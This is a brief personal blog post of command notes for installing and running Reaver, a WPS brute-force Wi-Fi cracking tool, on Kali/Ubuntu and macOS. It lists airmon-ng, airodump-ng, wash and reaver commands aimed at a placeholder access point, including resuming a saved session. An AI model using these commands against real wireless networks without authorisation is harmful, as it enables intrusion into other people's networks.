Tao He

Tao He

  • Docs
  • API
  • Help
  • Blog

›Recent Posts

Recent Posts

  • Microsoft PowerPoint
  • Chrome
  • Alfred
  • Docusaurus
  • Git Commands

Reaver

April 3, 2014

{% include JB/setup %}

Kali or Ubuntu

Install

apt-get install reaver

Run

airmon-ng start wlan0
airodump-ng mon0
reaver -i mon0 -b 00:11:22:33:44:55 -c 1 -vv

macOS

Install

airmon-ng on Mac OS X is not supported.

Use GoAgent, or you will failed downloading Aircrack-ng.

export http_proxy=http://127.0.0.1:8087

Install from Homebrew.

brew install aircrack-ng
brew install reaver

Run

ifconfig
sudo wash -i en0
sudo reaver -i en0 -b 00:11:22:33:44:55 -vv
cp /etc/reaver/ABC.wpc ~/
sudo reaver --session ~/ABC.wpc -i en0 -b 00:11:22:33:44:55 -vv
Recent Posts
  • Kali or Ubuntu
    • Install
    • Run
  • macOS
    • Install
    • Run
Tao He
Docs
Getting Started (or other categories)Guides (or other categories)API Reference (or other categories)
Community
User ShowcaseStack OverflowProject ChatTwitter
More
BlogGitHubStar
Facebook Open Source
Copyright © 2019 Your Name or Your Company Name